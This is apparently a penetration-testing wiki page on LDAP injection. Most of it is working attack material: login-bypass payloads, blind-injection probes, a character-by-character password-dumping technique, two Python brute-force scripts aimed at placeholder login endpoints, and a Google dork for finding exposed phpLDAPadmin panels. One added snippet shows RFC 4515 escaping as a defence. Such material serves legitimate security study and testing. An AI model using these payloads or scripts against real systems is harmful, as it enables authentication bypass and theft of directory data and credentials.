# LDAP Injection

## LDAP Injection

### **LDAP**

**If you want to know what LDAP is, see the following page:**

{% content-ref url="/pages/R0Yf80yXKM6IqcZVXzmD" %}
[389, 636, 3268, 3269 - Pentesting LDAP](/network-services-pentesting/pentesting-ldap.md)
{% endcontent-ref %}

**LDAP Injection** is an attack that targets web applications which build LDAP statements from user input. When the application **does not sanitize** that input correctly, an attacker can **manipulate the LDAP statements** through a local proxy, which can lead to unauthorized access or data manipulation.

{% file src="/files/aF3nz4D8icZX4dxBHKNv" %}

```
Filter     = ( filtercomp )
Filtercomp = and / or / not / item
And        = & filterlist
Or         = | filterlist
Not        = ! filter
Filterlist = 1*filter
Item       = simple / present / substring
Simple     = attr filtertype assertionvalue
Filtertype = '=' / '~=' / '>=' / '<='
Present    = attr = *
Substring  = attr "=" [initial] * [final]
Initial    = assertionvalue
Final      = assertionvalue
(&)        = Absolute TRUE
(|)        = Absolute FALSE
```

For example:\
`(&(!(objectClass=Impresoras))(uid=s*))`\
`(&(objectClass=user)(uid=*))`

You can access the database, which may contain information of many different types.

**OpenLDAP**: if 2 filters arrive, only the first one is executed.\
**ADAM or Microsoft LDS**: with 2 filters an error is thrown.\
**SunOne Directory Server 5.0**: both filters are executed.

**It is very important to send the filter with correct syntax, otherwise an error will be thrown. It is better to send only 1 filter.**

The filter must start with `&` or `|`\
Example: `(&(directory=val1)(folder=public))`

`(&(objectClass=VALUE1)(type=Epson*))`\
`VALUE1 = *)(ObjectClass=*))(&(objectClass=void`

Then: `(&(objectClass=*)(ObjectClass=*))` will be the first filter (the one that gets executed).

### Login Bypass

LDAP supports several formats for storing the password: clear, md5, smd5, sh1, sha, crypt. So, regardless of what you insert into the password field, it may be hashed before comparison.

```bash
user=*
password=*
--> (&(user=*)(password=*))
# The asterisks are great in LDAPi
```

```bash
user=*)(&
password=*)(&
--> (&(user=*)(&)(password=*)(&))
```

```bash
user=*)(|(&
pass=pwd)
--> (&(user=*)(|(&)(pass=pwd))
```

```bash
user=*)(|(password=*
password=test)
--> (&(user=*)(|(password=*)(password=test))
```

```bash
user=*))%00
pass=any
--> (&(user=*))%00 --> Nothing more is executed
```

```bash
user=admin)(&)
password=pwd
--> (&(user=admin)(&))(password=pwd) #Can throw an error
```

```bash
username = admin)(!(&(|
pass = any))
--> (&(uid= admin)(!(& (|) (webpassword=any)))) —> As (|) is FALSE then the user is admin and the password check is True.
```

```bash
username=*
password=*)(&
--> (&(user=*)(password=*)(&))
```

```bash
username=admin))(|(|
password=any
--> (&(uid=admin)) (| (|) (webpassword=any))
```
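As an added example (not code from the original page), here is the unsafe concatenation described above beside an RFC 4515-escaped version, with a small helper that splits the assembled string into its top-level filters so you can see how the `admin))(|(|` payload from the login-bypass list turns one filter into two (the OpenLDAP / ADAM behaviour noted earlier) and how escaping stops it. All function names are this example's own assumptions.

```python
# Added example (not from the original page); function names are assumptions.
# RFC 4515 requires these characters inside an assertion value to be escaped
# as a backslash followed by two hex digits.
FILTER_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}


def escape_filter_value(value: str) -> str:
    """Escape user input so it can only match as literal text inside a filter."""
    return "".join(FILTER_ESCAPES.get(ch, ch) for ch in value)


def build_login_filter_unsafe(user: str, password: str) -> str:
    """The vulnerable pattern: raw input concatenated into the filter."""
    return f"(&(user={user})(password={password}))"


def build_login_filter_safe(user: str, password: str) -> str:
    """Same filter, but every assertion value is escaped first."""
    return f"(&(user={escape_filter_value(user)})(password={escape_filter_value(password)}))"


def split_top_level_filters(filter_str: str) -> list:
    """Return the top-level parenthesised filters in an assembled string.
    A correctly built filter yields exactly one element. Two or more is the
    situation where OpenLDAP runs only the first filter and ADAM/LDS raise
    an error. Unbalanced parentheses raise ValueError.
    """
    parts, depth, start = [], 0, 0
    for i, ch in enumerate(filter_str):
        if ch == "(":
            if depth == 0:
                start = i
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth < 0:
                raise ValueError("unbalanced filter: unexpected ')'")
            if depth == 0:
                parts.append(filter_str[start:i + 1])
    if depth != 0:
        raise ValueError("unbalanced filter: missing ')'")
    return parts


if __name__ == "__main__":
    # Constructed sample input: the page's "admin))(|(|" login-bypass payload.
    raw = build_login_filter_unsafe("admin))(|(|", "any")
    print(raw, "->", len(split_top_level_filters(raw)), "top-level filters")
    safe = build_login_filter_safe("admin))(|(|", "any")
    print(safe, "->", len(split_top_level_filters(safe)), "top-level filter")
```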

#### Lists

* [LDAP\_FUZZ](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP_FUZZ.txt)
* [LDAP attributes](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP_attributes.txt)
* [LDAP PosixAccount attributes](https://tldp.org/HOWTO/archived/LDAP-Implementation-HOWTO/schemas.html)

### Blind LDAP Injection

You can force False or True responses to check whether any data is returned and confirm a possible Blind LDAP Injection:

```bash
#This will result in True, so some information will be shown
Payload: *)(objectClass=*))(&objectClass=void
Final query: (&(objectClass= *)(objectClass=*))(&objectClass=void )(type=Pepi*))
```

```bash
#This will result in False, so no information will be returned or shown
Payload: void)(objectClass=void))(&objectClass=void
Final query: (&(objectClass= void)(objectClass=void))(&objectClass=void )(type=Pepi*))
```

#### Dump data

You can iterate over the ASCII letters, digits and symbols:

```bash
(&(sn=administrator)(password=*))    : OK
(&(sn=administrator)(password=A*))   : KO
(&(sn=administrator)(password=B*))   : KO
...
(&(sn=administrator)(password=M*))   : OK
(&(sn=administrator)(password=MA*))  : KO
(&(sn=administrator)(password=MB*))  : KO
...
```

### Scripts

#### **Discover valid LDAP fields**

LDAP objects **contain several attributes by default** that can be used to **store information**. You can try to **brute-force all of them to extract that information**. You can find a [**list of default LDAP attributes here**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/Intruder/LDAP_attributes.txt).

```python
#!/usr/bin/python3
import requests
import string
from time import sleep
import sys

proxy = { "http": "localhost:8080" }
url = "http://10.10.10.10/login.php"
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"

attributes = ["c", "cn", "co", "commonName", "dc", "facsimileTelephoneNumber", "givenName", "gn", "homePhone", "id", "jpegPhoto", "l", "mail", "mobile", "name", "o", "objectClass", "ou", "owner", "pager", "password", "sn", "st", "surname", "uid", "username", "userPassword",]

for attribute in attributes: #Extract all attributes
    value = ""
    finish = False
    while not finish:
        for char in alphabet: #In each position test each possible printable char
            query = f"*)({attribute}={value}{char}*"
            data = {'login':query, 'password':'bla'}
            r = requests.post(url, data=data, proxies=proxy)
            sys.stdout.write(f"\r{attribute}: {value}{char}")
            #sleep(0.5) #Avoid brute-force bans
            if "Cannot login" in r.text:
                value += str(char)
                break

            if char == alphabet[-1]: #If last of all the chars, then, no more chars in the value
                finish = True
    print()
```

#### **Special Blind LDAP Injection (without "\*")**

```python
#!/usr/bin/python3

import requests, string
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"

flag = ""
for i in range(50):
    print("[i] Looking for number " + str(i))
    for char in alphabet:
        r = requests.get("http://ctf.web??action=dir&search=admin*)(password=" + flag + char)
        if ("TRUE CONDITION" in r.text):
            flag += char
            print("[+] Flag: " + flag)
            break
```

### Google Dorks

```bash
intitle:"phpLDAPadmin" inurl:cmd.php
```

### More Payloads

{% embed url="<https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection>" %}
